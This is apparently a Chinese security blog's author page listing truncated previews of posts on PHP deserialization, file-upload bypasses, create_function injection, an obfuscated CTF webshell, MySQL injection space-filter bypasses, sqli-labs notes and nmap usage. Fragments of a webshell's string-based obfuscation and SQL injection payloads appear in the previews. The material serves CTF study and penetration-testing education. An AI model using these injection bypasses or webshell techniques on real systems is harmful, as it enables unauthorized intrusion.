信息安全
u014704893
这个作者很懒,什么都没留下…
展开
-
php反序列化
php存在一个很有意思的漏洞,php对象注入,也可以称为php反序列化漏洞 序列化一个对象将会保存对象的所有变量,但是不会保存对象的方法,只会保存类的名字反序列化之代码注入: 我们先来看一段存在漏洞的代码。转载 2016-11-02 22:01:58 · 294 阅读 · 0 评论 -
文件上上传漏洞
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)文件上传校验姿势转载 2016-10-22 19:54:43 · 487 阅读 · 0 评论 -
php create_function()产生的漏洞
create_function(‘参数’,’函数体’):官方example:<?php$newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);'); echo "New anonymous function: $newfunc\n";echo $newfunc(2, M_E) . "\n";转载 2016-11-03 16:41:46 · 3021 阅读 · 0 评论 -
php webshell 过狗
今天在做ctf题时,遇到了一个关于web的题目,题目要求是找到webshell的密码,且webshell,可以下载下来!!webshell的代码:<?php $sNFSM8939 = "py)v95c_*gwr/a;4nodtz2i(k6jx831feb7s0muq.hl";$VgiNDZ6054 = $sNFSM8939[0].$sNFSM8939[11].$sNFSM8939[32].$sNF原创 2016-11-06 19:41:24 · 108367 阅读 · 0 评论 -
关于mysql注入,替换空格
在今天进行sql注入的测试过程中,在代码中过滤了空格 – # ,等字符串,经过不懈的努力,最终只剩下空格还没有被替换,所以在这,总结一下在mysql中如何替换空格。替换空格:select * from table where id=1E0union selsect 1,2,3select * from table where id=1.0union select 1,2,3select * f转载 2016-10-16 13:30:18 · 3572 阅读 · 0 评论 -
sqli labs 6
1. 题目26当id=1时,页面报错:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1 所以我猜测sql语句是:select *原创 2016-10-16 14:23:12 · 295 阅读 · 0 评论 -
nmap 常用语法简介
nmap xx.xx.x.x Host is up (0.0012s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https 3306/tcp open mysql 8009/tcp open a原创 2016-10-18 13:42:47 · 2927 阅读 · 0 评论